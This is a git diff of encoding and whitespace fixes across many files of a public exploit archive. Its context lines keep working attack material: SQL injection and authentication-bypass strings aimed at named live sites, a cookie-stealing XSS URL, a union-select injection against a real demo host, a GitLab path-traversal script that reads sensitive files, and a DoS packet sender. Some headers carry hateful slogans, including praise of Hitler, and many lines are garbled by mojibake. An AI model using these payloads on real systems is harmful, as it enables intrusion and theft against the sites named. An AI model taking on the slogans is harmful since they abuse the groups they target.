--- a/exploits/php/webapps/7465.txt
+++ b/exploits/php/webapps/7465.txt
@@ -1,4 +1,4 @@
-[â– ]  IsWeb CMS v 3.0 ($qL/XsS) Multiple vulnerabilities
+[â– ]  IsWeb CMS v 3.0 ($qL/XsS) Multiple vulnerabilities
  
 >---------------------------------------<
 
@@ -10,7 +10,7 @@
 >---------------------------------------<
  
  
-[â– ] BlinD $qL:
+[â– ] BlinD $qL:
  
 |: http://www.example.com/index.php?id_sezione=[$qL] 
 
@@ -21,7 +21,7 @@
 |: http://www.comune.avezzano.aq.it/index.php?id_sezione=297%20and%20substring(@@version,1,1)=5 [Ye$]
  
  
-[â– ] XSS: 
+[â– ] XSS: 
  
 |: http://www.comune.avezzano.aq.it/index.php?azione=cerca  
   In this modul (search) write:
@@ -32,7 +32,7 @@ or another vuln Page:
  
 |: http://www.comune.avezzano.aq.it/index.php?id_doc=19&id_oggetto=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3Cmarquee%3E%3Ch1%3EXSS%20by%20XaDoS%3Ch1%3E%3C/marquee%3E
  
-[â– ] Th4nKs::
+[â– ] Th4nKs::
  
 \>Str0ke</ - \>Fuck you 007 hacker</ - \>Securitycode team</ - \>All italian hackers</
 
diff --git a/exploits/php/webapps/7587.txt b/exploits/php/webapps/7587.txt
index d7b1e1a1d..b508dbce4 100644
--- a/exploits/php/webapps/7587.txt
+++ b/exploits/php/webapps/7587.txt
@@ -1,4 +1,4 @@
-[â– ]  Joomla Component PAX Gallery v 0.1 (gid) <= Blind SQL Injection Vulnerability
+[â– ]  Joomla Component PAX Gallery v 0.1 (gid) <= Blind SQL Injection Vulnerability
  
 >---------------------------------------<
 
@@ -10,13 +10,13 @@
 >---------------------------------------<
  
 
-[â– ] ExPL0iT:
+[â– ] ExPL0iT:
 
 
 |: http://www.example.com/path/com_paxgallery&task=table&gid=[$qL] 
 
 
-[■] D£M0: 
+[■] D£M0: 
 
 >Version:
 
@@ -29,7 +29,7 @@
  
 d8e423..ecc... ;-)
  
-[â– ] Th4nKs::
+[â– ] Th4nKs::
  
 \> Str0ke </ \> Securitycode Team </ \> StaKer </
 
diff --git a/exploits/php/webapps/7611.php b/exploits/php/webapps/7611.php
index 4b0afc472..cccd21b58 100644
--- a/exploits/php/webapps/7611.php
+++ b/exploits/php/webapps/7611.php
@@ -105,7 +105,7 @@ function brute($User_id,$table)
 	}
 	else
 	{
-		$b_str = "1abcdefghijklmnopqrstuvwxyz_234567890 !'#%&()*+,-./:;<=>?@[\]^{|}~àáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿž";
+		$b_str = "1abcdefghijklmnopqrstuvwxyz_234567890 !'#%&()*+,-./:;<=>?@[\]^{|}~à áâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿž";
 	}
 
 	$b_arr = str_split($b_str);
diff --git a/exploits/php/webapps/7880.txt b/exploits/php/webapps/7880.txt
index 83dabad33..817bb3a73 100644
--- a/exploits/php/webapps/7880.txt
+++ b/exploits/php/webapps/7880.txt
@@ -1,55 +1,55 @@
 [☢] ☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢{بسم الله الرحمن الرحيم}☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢
 
 
-[☠]
+[☠]
 [~] Tybe:(Auth Bypass) Remote SQL Injection Vulnerability
 
-[☠]
+[☠]
 
 [~] Vendor: ClickAuction
 
-[☠]
-[☠] Software: ClickAuction
+[☠]
+[☠] Software: ClickAuction
 
-[☠]
-[☠] author: ((я3d D3v!L))
+[☠]
+[☠] author: ((я3d D3v!L))
 
 
-[☠]
-[☠] Date: 26.1.2009
+[☠]
+[☠] Date: 26.1.2009
 
 
-[☠]
-[☠] Home: www.ahacker.biz
+[☠]
+[☠] Home: www.ahacker.biz
 
-[☠]
-[☠] contact: N/A
+[☠]
+[☠] contact: N/A
 
 
 
-[☠]☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠{DEV!L'5 of SYST3M}☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠
+[☠]☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠{DEV!L'5 of SYST3M}☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠
 
 
-[☠] Exploit:
+[☠] Exploit:
 
 
 
-[☠] username: r0' or ' 1=1--
+[☠] username: r0' or ' 1=1--
 
 
-[☠] password: r0' or ' 1=1--
+[☠] password: r0' or ' 1=1--
 
 
 
 
-[☠]login 4 d3m0:
+[☠]login 4 d3m0:
 
 
 
-[☠]www.clicktech.com/clickauction/login.asp
+[☠]www.clicktech.com/clickauction/login.asp
 
 N073:
-FUCKEN !SRAEL DON'T FORGET ((☠HETLAR☠))
+FUCKEN !SRAEL DON'T FORGET ((☠HETLAR☠))
 
 GOD HELP GAZA!!
 
@@ -62,7 +62,7 @@ GOD HELP GAZA!!
 
 [~]
 
-[☠] EV!L !NS!D3 734M --- R3d-D3v!L--EXOT!C --poison scorbion --samakiller
+[☠] EV!L !NS!D3 734M --- R3d-D3v!L--EXOT!C --poison scorbion --samakiller
 
 [~]
 
diff --git a/exploits/php/webapps/7927.txt b/exploits/php/webapps/7927.txt
index 72720a05e..6b3541180 100644
--- a/exploits/php/webapps/7927.txt
+++ b/exploits/php/webapps/7927.txt
@@ -23,7 +23,7 @@ include_once("./_common.php");
 $po = sql_fetch(" select * from $g4[poll_table] where po_id = '$po_id' ");
 if (!$po[po_id]) 
 
-¡Š¡Š
+¡Š¡Š
 
 echo "<script language='javascript' src='$g4[path]/js/sideview.js'></script>";
 
@@ -48,7 +48,7 @@ if (!defined("_GNUBOARD_")) exit;
 <style type="text/css">
 <!--
 
-¡Š¡Š
+¡Š¡Š
 
 function fregisterform_submit(f) 
 {
@@ -57,7 +57,7 @@ function fregisterform_submit(f)
         reg_mb_id_check();
 
         if ($F('mb_id_enabled')!='000') {	
-            alert('Èž¿øŸÆÀ̵𞊠ÀÔ·ÂÇÏÁö ŸÊŸÒ°Å³ª ÀԷ¿¡ ¿À·ù°¡ ÀÖœÀŽÏŽÙ.');
+            alert('Èž¿øŸÆÀ̵𞊠ÀÔ·ÂÇÏÁö ŸÊŸÒ°Å³ª ÀԷ¿¡ ¿À·ù°¡ ÀÖœÀŽÏŽÙ.');
             $('reg_mb_id').activate();
             return false;
         }
@@ -68,11 +68,11 @@ function fregisterform_submit(f)
 <?
 include_once("./_common.php");
 
-¡Š¡Š
+¡Š¡Š
 
 $sql_common = " from $g4[point_table] where mb_id = '$member[mb_id]' "; //mb_id
 
-¡Š¡Š
+¡Š¡Š
 
                 $sql = " select * 
                           $sql_common
@@ -95,7 +95,7 @@ include_once("./_common.php");
 
 @include_once("$board_skin_path/write_update.head.skin.php");
 
-¡Š¡Š
+¡Š¡Š
 
 $filename = preg_replace("/\.(php|phtm|htm|cgi|pl|exe|jsp|asp|inc)/i", "$0-x", $filename);
 $upload[$i][file] = abs(ip2long($_SERVER[REMOTE_ADDR])).'_'.substr(md5(uniqid($g4[server_time])),0,8).'_'.str_replace('%', '', urlencode($filename)); 
diff --git a/exploits/php/webapps/7953.txt b/exploits/php/webapps/7953.txt
index f8fd30438..7507021a0 100644
--- a/exploits/php/webapps/7953.txt
+++ b/exploits/php/webapps/7953.txt
@@ -1,31 +1,31 @@
 [☢] ☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢{بسم الله الرحمن الرحيم}☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢
- [☠]
+ [☠]
 [~] Tybe:(Auth Bypass) Remote SQL Injection Vulnerability
- [☠]
+ [☠]
 [~] Vendor: clicktech.com
- [☠]
-[☠] Software: clickcart 6.0
- [☠]
-[☠] author: ((я3d D3v!L))
- [☠]
-[☠] Date: 2.2.2009
- [☠]
-[☠] Home: WwW.aHACKER.biz
- [☠]
-[☠] contact: N/A
-[☠]☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠{DEV!L'5 of SYST3M}☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠
+ [☠]
+[☠] Software: clickcart 6.0
+ [☠]
+[☠] author: ((я3d D3v!L))
+ [☠]
+[☠] Date: 2.2.2009
+ [☠]
+[☠] Home: WwW.aHACKER.biz
+ [☠]
+[☠] contact: N/A
+[☠]☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠{DEV!L'5 of SYST3M}☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠
 
-[☠] Exploit:
+[☠] Exploit:
 
-[☠] E-/\/\A!L : r0' or ' 1=1--
-[☠] password : r0' or ' 1=1--
+[☠] E-/\/\A!L : r0' or ' 1=1--
+[☠] password : r0' or ' 1=1--
 
-[☠]login 4 d3m0:
+[☠]login 4 d3m0:
 
-[☠]www.clicktech.com/clickcart6/customer_login.asp
+[☠]www.clicktech.com/clickcart6/customer_login.asp
 
 N073:
-FUCKEN !SRAEL DON'T FORGET ((☠HETLAR☠))
+FUCKEN !SRAEL DON'T FORGET ((☠HETLAR☠))
 
 GOD HELP GAZA!!
 
@@ -34,7 +34,7 @@ GOD HELP GAZA!!
  [~]
 [~] spechial thanks : ((dolly)) & ((7am3m)) & ghost L0v3R & ۩۞۩๑ SEMSEM ๑۩۞۩ & {str0ke}
  [~]
-[☠] EV!L !NS!D3 734M --- R3d-D3v!L--EXOT!C --poison scorbion --samakiller
+[☠] EV!L !NS!D3 734M --- R3d-D3v!L--EXOT!C --poison scorbion --samakiller
  [~]
 [~] exploi6.biZ & ahacker.biz
  [~]
diff --git a/exploits/php/webapps/8000.txt b/exploits/php/webapps/8000.txt
index 58f530827..2b9ecf058 100644
--- a/exploits/php/webapps/8000.txt
+++ b/exploits/php/webapps/8000.txt
@@ -24,7 +24,7 @@ Download : http://www.zeroboard.com
 
 	include "_head.php";
 
-¡Š¡Š
+¡Š¡Š
 
 @mysql_query("update $t_board"."_$id set headnum='$headnum',prev_no='$prev_no',next_no='$next_no',
 	 child='$child',depth='$depth',arrangenum='$arrangenum',father='$father',name='$name',email='$email',
@@ -64,7 +64,7 @@ Yeah.. Itz very bad news :-|
 	//When someone trying to modify his own post,
 	//Permission is checked right this: 
 
-¡Š¡Š
+¡Š¡Š
 
 if($mode=="modify") {
 
diff --git a/exploits/php/webapps/8717.txt b/exploits/php/webapps/8717.txt
index 40cdac95e..34c7e8d8b 100644
--- a/exploits/php/webapps/8717.txt
+++ b/exploits/php/webapps/8717.txt
@@ -26,7 +26,7 @@ change pass and add admin:
 <td align="left"><input type="password" name="password" size="24"></td>
 </tr>
 <tr>
-<td align="left" valign="top" bgcolor="#f5f5f5" width="20%"><strong>E-mail Address:</strong></td>
+<td align="left" valign="top" bgcolor="#f5f5f5" width="20%"><strong>E-mail Address:</strong></td>
 <td align="left" bgcolor="#f5f5f5"><input type="text" name="mail" value="" size="24"></td>
 </tr>
 <tr>
diff --git a/exploits/php/webapps/8900.txt b/exploits/php/webapps/8900.txt
index 0c9486be5..55f0ddf57 100644
--- a/exploits/php/webapps/8900.txt
+++ b/exploits/php/webapps/8900.txt
@@ -1,6 +1,6 @@
              Viva l'Algérie 3-1  --->Karim Matmour-->Abdel-Kader Ghazal-->Rafik al-Zuhair Jabbur-->
-                                 Félicitations à tous les Algériens
-                                 L'Algérie bat l'Egypte 3-1 à aller
+                                 Félicitations à tous les Algériens
+                                 L'Algérie bat l'Egypte 3-1 à aller
                                      El akouba pour le retour
 #-------------------------AllaH AkbaR-------------------------------
 #Frontis V3.9.01.24 Remote SQL Injection Vulnerability
diff --git a/exploits/php/webapps/8901.txt b/exploits/php/webapps/8901.txt
index f1adfd2c8..712788f56 100644
--- a/exploits/php/webapps/8901.txt
+++ b/exploits/php/webapps/8901.txt
@@ -1,6 +1,6 @@
 Viva l'Algérie 3-1  --->Karim Matmour-->Abdel-Kader Ghazal-->Rafik al-Zuhair Jabbur-->
-Félicitations à tous les Algériens
-L'Algérie bat l'Egypte 3-1 à aller
+Félicitations à tous les Algériens
+L'Algérie bat l'Egypte 3-1 à aller
 El akouba pour le retour
 #-------------------------AllaH AkbaR-------------------------------
 #Virtue News Multiple Remote Vulnerabilities
diff --git a/exploits/php/webapps/9399.txt b/exploits/php/webapps/9399.txt
index 3f2d1a639..ab6d7e929 100644
--- a/exploits/php/webapps/9399.txt
+++ b/exploits/php/webapps/9399.txt
@@ -14,11 +14,11 @@
 
 [~] Site: www.Scam4u.com + www.Dns-Team.com
 
-[~] Greetz: Sa4d + HSMX + Stack + PR0H4CK3RZ  + N@bilX + Ga3 Réjàlà Xd :)
+[~] Greetz: Sa4d + HSMX + Stack + PR0H4CK3RZ  + N@bilX + Ga3 Réjà là Xd :)
 
 [~] Download : http://www.logoshows.com/download/bbs88.rar
 
-#[---------------------------------I'm Kh0K0m MàN!x--------------------------------------]
+#[---------------------------------I'm Kh0K0m MÃ N!x--------------------------------------]
 [»] Demo :
 #
 # http://www.logoshows.com/bbs/globepersonnel_login.asp
diff --git a/exploits/php/webapps/9603.txt b/exploits/php/webapps/9603.txt
index 3ab254fbb..280750c81 100644
--- a/exploits/php/webapps/9603.txt
+++ b/exploits/php/webapps/9603.txt
@@ -1,37 +1,37 @@
 [☢] ☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢{بسم الله الرحمن الرحيم}☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢
-[☠]
+[☠]
 [~] Tybe:(view.php user_id) Remote SQL Injection Vulnerability
-[☠]
+[☠]
 [~] Vendor: www.phpmodelagencyscript.com
-[☠]
-[☠] Software: Model Agency Manager PRO
-[☠]
-[☠] author: ((я3d D3v!L))
-[☠]
-[☠] Date: 7.9.2009
-[☠]
-[☠] Home: CL0S3D
-[☠]
-[☠] contact: X@hotmail.co.jp
-[☠]☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠{DEV!L'5 of SYST3M}☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠
+[☠]
+[☠] Software: Model Agency Manager PRO
+[☠]
+[☠] author: ((я3d D3v!L))
+[☠]
+[☠] Date: 7.9.2009
+[☠]
+[☠] Home: CL0S3D
+[☠]
+[☠] contact: X@hotmail.co.jp
+[☠]☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠{DEV!L'5 of SYST3M}☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠
 
-[☠] Exploit:
+[☠] Exploit:
 
-[☠] XxX/view.php?user_id= EV!L !NJECT
-[☠] (EV!L !NJ3c7):1%20union%20select%20user(),2,3,4/*&view=photos
+[☠] XxX/view.php?user_id= EV!L !NJECT
+[☠] (EV!L !NJ3c7):1%20union%20select%20user(),2,3,4/*&view=photos
 
-[☠] L!VE Exploit:
+[☠] L!VE Exploit:
 http://model-agency-manager-pro.phpmodelagencyscript.com/view.php?user_id=1%20union%20select%20user(),2,3,4/*&view=photos
-[☠]MORE ER0RR:
+[☠]MORE ER0RR:
 photos.php?user_id=((я3d D3v!L))
 
 motm.php?user_id=((DEV!L-Ro007))
 forum_message.php?id=((STr0KE))
 
-[☠]
+[☠]
 
 N073:
-REAL R3d-d3V!L !S h3R3 LAM3RZ ((☠X☠))
+REAL R3d-d3V!L !S h3R3 LAM3RZ ((☠X☠))
 
 ARAB!AAN HAAACCKER !!
 
@@ -40,7 +40,7 @@ ARAB!AAN HAAACCKER !!
 [~]
 [~] spechial thanks : ((dolly)) & ((7am3m)) & ghost L0v3R & ۩۞۩๑ عماد ๑۩۞۩ & {0rashey}
 [~]
-[☠] EV!L !NS!D3 734M --- R3d-D3v!L--EXOT!C --poison scorbion --samakiller
+[☠] EV!L !NS!D3 734M --- R3d-D3v!L--EXOT!C --poison scorbion --samakiller
 [~]
 [~]!'M 4r48!4N 3xPLO!T3R
 [~]
diff --git a/exploits/ruby/webapps/49076.py b/exploits/ruby/webapps/49076.py
index 7e21d22f6..6f9754d4e 100755
--- a/exploits/ruby/webapps/49076.py
+++ b/exploits/ruby/webapps/49076.py
@@ -37,25 +37,25 @@ host = ''
 
 def exploit(projectName, issueTitle, files, token):
 
-    gl = Gitlab(host, private_token=token, session=session)
-    gl.auth()
-    p1 = gl.projects.create({'name': f"{projectName}-1"})
-    p2 = gl.projects.create({'name': f"{projectName}-2"})
+    gl = Gitlab(host, private_token=token, session=session)
+    gl.auth()
+    p1 = gl.projects.create({'name': f"{projectName}-1"})
+    p2 = gl.projects.create({'name': f"{projectName}-2"})
 
-    for i, f in enumerate(files):
-        stripped_f = f.rstrip('\n')
-        issue = p1.issues.create({ \
-                'title': f"{issueTitle}-{i}",
-                'description': \
-                "![a](/uploads/11111111111111111111111111111111/"\
-                f"../../../../../../../../../../../../../..{stripped_f})"})
-        print(issue.description)
-        sleep(3)
-        try:
-            issue.move(p2.id)
-        except Exception as e:
-            pass
-        sleep(3)
+    for i, f in enumerate(files):
+        stripped_f = f.rstrip('\n')
+        issue = p1.issues.create({ \
+                'title': f"{issueTitle}-{i}",
+                'description': \
+                "![a](/uploads/11111111111111111111111111111111/"\
+                f"../../../../../../../../../../../../../..{stripped_f})"})
+        print(issue.description)
+        sleep(3)
+        try:
+            issue.move(p2.id)
+        except Exception as e:
+            pass
+        sleep(3)
 
 if __name__ == "__main__":
 
@@ -64,5 +64,5 @@ if __name__ == "__main__":
          for file in write_files:
              sens.write(file)
 
-    files = list(open('sensitive_files', 'r'))
-    exploit('project-1', 'issue-1', files)
\ No newline at end of file
+    files = list(open('sensitive_files', 'r'))
+    exploit('project-1', 'issue-1', files)
\ No newline at end of file
diff --git a/exploits/windows/dos/10879.html b/exploits/windows/dos/10879.html
index 663d93c38..fcb50d858 100644
--- a/exploits/windows/dos/10879.html
+++ b/exploits/windows/dos/10879.html
@@ -28,9 +28,9 @@ Click 1?) and the 2?) (look the Status bar for the 2?)) and you'll be redirect o
 <br>
 <br>
 <br>
-                           <font style="font-family:arial;font-size:32px">Look Here<br>
-                   | <br>
-                  V
+                           <font style="font-family:arial;font-size:32px">Look Here<br>
+                   | <br>
+                  V
 
 <script>
 
diff --git a/exploits/windows/dos/28049.html b/exploits/windows/dos/28049.html
index e0b7b146b..62aed991d 100644
--- a/exploits/windows/dos/28049.html
+++ b/exploits/windows/dos/28049.html
@@ -10,7 +10,7 @@
 <html>
  <body>
  <table style="table-layout:fixed" >
-        <col id="132" width="41" span="1" >  </col>
+        <col id="132" width="41" span="1" >  </col>
  </table>
  <script>
  
diff --git a/exploits/windows/dos/3307.html b/exploits/windows/dos/3307.html
index d948f70d2..6927d8c66 100644
--- a/exploits/windows/dos/3307.html
+++ b/exploits/windows/dos/3307.html
@@ -47,7 +47,7 @@ End Sub
 <br>              ESI=00000008: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
 <br>              EDI=031AD432: 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
 <br>              EIP=047A184D: 8B 90 84 04 00 00 8D 88-7C 04 00 00 85 D2 7E 09
-<br>                            --> N/A
+<br>                            --> N/A
 <br>              ----------------------------------------------------------------
 <br>
 <br>12:18:20.311  pid=0D6C tid=0AD0  EXCEPTION (first-chance)
@@ -63,7 +63,7 @@ End Sub
 <br>              ESI=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
 <br>              EDI=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
 <br>              EIP=41414141: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
-<br>                            --> N/A
+<br>                            --> N/A
 <br>              ----------------------------------------------------------------
 <br>
 <br>12:18:20.311  pid=0D6C tid=0AD0  EXCEPTION (first-chance)
@@ -79,7 +79,7 @@ End Sub
 <br>              ESI=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
 <br>              EDI=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
 <br>              EIP=41414141: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
-<br>                            --> N/A
+<br>                            --> N/A
 <br>              ----------------------------------------------------------------
 <br>To be continued...</font>
 
diff --git a/exploits/windows/dos/38758.py b/exploits/windows/dos/38758.py
index 520b7c038..141cfdbcb 100755
--- a/exploits/windows/dos/38758.py
+++ b/exploits/windows/dos/38758.py
@@ -1,14 +1,14 @@
 #!/usr/bin/env python
 # -*- coding: utf-8 -*-
-# Exploit Title     : SuperScan 4.1 Scan Hostname/IP Field Buffer Overflow Crash PoC
-# Discovery by      : Luis Martínez
+# Exploit Title     : SuperScan 4.1 Scan Hostname/IP Field Buffer Overflow Crash PoC
+# Discovery by      : Luis Martínez
 # Email		    : l4m5@hotmail.com
-# Discovery Date    : 18/11/2015
-# Vendor Homepage   : http://www.foundstone.com
-# Software Link     : http://www.mcafee.com/us/downloads/free-tools/superscan.aspx
-# Tested Version    : 4.1
-# Vulnerability Type    : Denial of Service (DoS) Local
-# Tested on OS      : Windows XP Professional SP3 x86 es
+# Discovery Date    : 18/11/2015
+# Vendor Homepage   : http://www.foundstone.com
+# Software Link     : http://www.mcafee.com/us/downloads/free-tools/superscan.aspx
+# Tested Version    : 4.1
+# Vulnerability Type    : Denial of Service (DoS) Local
+# Tested on OS      : Windows XP Professional SP3 x86 es
 # Steps to Produce the Crash: 
 # 1.- Run python code : python super_scan_4.1.py
 # 2.- Open super_scan_4.1.txt and copy content to clipboard
diff --git a/exploits/windows/dos/38759.py b/exploits/windows/dos/38759.py
index 273f1f053..480b66bb5 100755
--- a/exploits/windows/dos/38759.py
+++ b/exploits/windows/dos/38759.py
@@ -1,14 +1,14 @@
 #!/usr/bin/env python
 # -*- coding: utf-8 -*-
-# Exploit Title     : SuperScan 4.1 Tools Hostname/IP/URL Field Buffer Overflow Crash PoC
-# Discovery by      : Luis Martínez
+# Exploit Title     : SuperScan 4.1 Tools Hostname/IP/URL Field Buffer Overflow Crash PoC
+# Discovery by      : Luis Martínez
 # Email		    : l4m5@hotmail.com
-# Discovery Date    : 18/11/2015
-# Vendor Homepage   : http://www.foundstone.com
-# Software Link     : http://www.mcafee.com/us/downloads/free-tools/superscan.aspx
-# Tested Version    : 4.1
-# Vulnerability Type    : Denial of Service (DoS) Local
-# Tested on OS      : Windows XP Professional SP3 x86 es
+# Discovery Date    : 18/11/2015
+# Vendor Homepage   : http://www.foundstone.com
+# Software Link     : http://www.mcafee.com/us/downloads/free-tools/superscan.aspx
+# Tested Version    : 4.1
+# Vulnerability Type    : Denial of Service (DoS) Local
+# Tested on OS      : Windows XP Professional SP3 x86 es
 # Steps to Produce the Crash: 
 # 1.- Run python code : python super_scan_4.1_tools.py
 # 2.- Open super_scan_4.1_tools.txt and copy content to clipboard
diff --git a/exploits/windows/dos/38760.py b/exploits/windows/dos/38760.py
index 43692e729..cff1924a7 100755
--- a/exploits/windows/dos/38760.py
+++ b/exploits/windows/dos/38760.py
@@ -1,14 +1,14 @@
 #!/usr/bin/env python
 # -*- coding: utf-8 -*-
-# Exploit Title     : SuperScan 4.1 Windows Enumeration Hostname/IP/URL Field SEH Overflow Crash PoC
-# Discovery by      : Luis Martínez
+# Exploit Title     : SuperScan 4.1 Windows Enumeration Hostname/IP/URL Field SEH Overflow Crash PoC
+# Discovery by      : Luis Martínez
 # Email		    : l4m5@hotmail.com
-# Discovery Date    : 18/11/2015
-# Vendor Homepage   : http://www.foundstone.com
-# Software Link     : http://www.mcafee.com/us/downloads/free-tools/superscan.aspx
-# Tested Version    : 4.1
-# Vulnerability Type    : Denial of Service (DoS) Local
-# Tested on OS      : Windows XP Professional SP3 x86 es
+# Discovery Date    : 18/11/2015
+# Vendor Homepage   : http://www.foundstone.com
+# Software Link     : http://www.mcafee.com/us/downloads/free-tools/superscan.aspx
+# Tested Version    : 4.1
+# Vulnerability Type    : Denial of Service (DoS) Local
+# Tested on OS      : Windows XP Professional SP3 x86 es
 # Steps to Produce the Crash: 
 # 1.- Run python code : python super_scan_4.1_windows_enumeration.py
 # 2.- Open super_scan_4.1_windows_enumeration.txt and copy content to clipboard
diff --git a/exploits/windows/dos/39216.py b/exploits/windows/dos/39216.py
index 73c17e3a1..277e3d6b3 100755
--- a/exploits/windows/dos/39216.py
+++ b/exploits/windows/dos/39216.py
@@ -5,12 +5,12 @@
 # Download Link : http://sourceforge.net/projects/keepass/files/KeePass%201.x/1.30/KeePass-1.30.zip
 #
 #
-# Author      :   Mohammad Reza Espargham
-# Linkedin    :   https://ir.linkedin.com/in/rezasp
-# E-Mail      :   me[at]reza[dot]es , reza.espargham[at]gmail[dot]com
-# Website     :   www.reza.es
-# Twitter     :   https://twitter.com/rezesp
-# FaceBook    :   https://www.facebook.com/reza.espargham
+# Author      :   Mohammad Reza Espargham
+# Linkedin    :   https://ir.linkedin.com/in/rezasp
+# E-Mail      :   me[at]reza[dot]es , reza.espargham[at]gmail[dot]com
+# Website     :   www.reza.es
+# Twitter     :   https://twitter.com/rezesp
+# FaceBook    :   https://www.facebook.com/reza.espargham
 #
 #
 # 1 . run python code : python crash.py
diff --git a/exploits/windows/dos/43403.py b/exploits/windows/dos/43403.py
index 3003058d5..5efb0bddf 100755
--- a/exploits/windows/dos/43403.py
+++ b/exploits/windows/dos/43403.py
@@ -12,7 +12,7 @@
 import socket
 target = "192.168.72.133"
 port = 9221
-s  = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
+s  = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
 s.connect((target,port))
 packet = "\x75\x19\xba\xab\x03"
 packet +="\x00\x00\x00\x01\x00\x00\x00\x1a"
@@ -34,8 +34,8 @@ s.send(packet)
 
 try:
 
-         data = s.recv(100)
+         data = s.recv(100)
 
 except:
 
-         print "K1LL3D"
\ No newline at end of file
+         print "K1LL3D"
\ No newline at end of file
diff --git a/exploits/windows/dos/4682.c b/exploits/windows/dos/4682.c
index 18bc3cb1a..c856c6f50 100644
--- a/exploits/windows/dos/4682.c
+++ b/exploits/windows/dos/4682.c
@@ -7,10 +7,10 @@
 
  * 送人
 
- * 雨歇長堤草色多
+ * é›¨æ­‡é•·å ¤è‰è‰²å¤š
  * 送君南浦動悲歌
  * 大同江水何時盡
- * 別淚年年添綠波
+ * åˆ¥æ·šå¹´å¹´æ·»ç¶ æ³¢
 
  * If you open the kr.aiff in Window Media Player(WMP), WMP will
  * crash, and this crash will ocurr in other media players as well
diff --git a/exploits/windows/dos/5225.html b/exploits/windows/dos/5225.html
index 15fa49fdc..21cfe540b 100644
--- a/exploits/windows/dos/5225.html
+++ b/exploits/windows/dos/5225.html
@@ -54,7 +54,7 @@ target1.SetUninstallName(str1);
 .text:10012283                 push    [esp+Source]    ; Source
 .text:10012287                 add     eax, 0D70h
 .text:1001228C                 push    eax             ; Dest
-.text:1001228D                 call    _wcscpy         ; 没有检查用户输入的长度就,造成heap overlfow
+.text:1001228D                 call    _wcscpy         ; 没有检查用户输入的长度就,é€ æˆheap overlfow
 .text:10012292                 pop     ecx
 .text:10012293                 pop     ecx
 .text:10012294
diff --git a/exploits/windows/dos/9496.txt b/exploits/windows/dos/9496.txt
index fddfefa56..caf092c59 100644
--- a/exploits/windows/dos/9496.txt
+++ b/exploits/windows/dos/9496.txt
@@ -13,7 +13,7 @@ Microsoft Windows XP [version 5.1.2600]
 C:\Documents and Settings\Administrateur>ftp
 ftp> open
 Vers 5.237.109.181 21
-Connecté à 5.237.109.181.
+Connecté à 5.237.109.181.
 220- Jgaa's Fan Club FTP Service WAR-FTPD 1.65 Ready
 220 Please enter your user name.
 Utilisateur (5.237.109.181:(none)) : root
diff --git a/exploits/windows/local/3695.c b/exploits/windows/local/3695.c
index 3a20b0610..2a72c869f 100644
--- a/exploits/windows/local/3695.c
+++ b/exploits/windows/local/3695.c
@@ -8,7 +8,7 @@
         
         
         Exploit coded listen sauna hits
-                Featuring Luiz Zanardo's gigs "Minoide - \x52\x49\x46\x46\x00\x04\x00\x41" @ www.myspace.com/fuzzyproject
+                Featuring Luiz Zanardo's gigs "Minoide - \x52\x49\x46\x46\x00\x04\x00\x41" @ www.myspace.com/fuzzyproject
         
         Breno Silva Pinto
         bsilva[at]Sekure.org
diff --git a/exploits/windows/local/42116.txt b/exploits/windows/local/42116.txt
index deff45020..0e1ea75ba 100644
--- a/exploits/windows/local/42116.txt
+++ b/exploits/windows/local/42116.txt
@@ -1,15 +1,15 @@
-#[+] Title:  Parallels Desktop - Virtual Machine Escape
+#[+] Title:  Parallels Desktop - Virtual Machine Escape
 #[+] Product: Parallels
 #[+] Vendor: http://www.parallels.com/products/desktop/
 #[+] Affected Versions: All Version
 #
 #
-# Author      :   Mohammad Reza Espargham
-# Linkedin    :   https://ir.linkedin.com/in/rezasp
-# E-Mail      :   me[at]reza[dot]es , reza.espargham[at]gmail[dot]com
-# Website     :   www.reza.es
-# Twitter     :   https://twitter.com/rezesp
-# FaceBook    :   https://www.facebook.com/reza.espargham
+# Author      :   Mohammad Reza Espargham
+# Linkedin    :   https://ir.linkedin.com/in/rezasp
+# E-Mail      :   me[at]reza[dot]es , reza.espargham[at]gmail[dot]com
+# Website     :   www.reza.es
+# Twitter     :   https://twitter.com/rezesp
+# FaceBook    :   https://www.facebook.com/reza.espargham
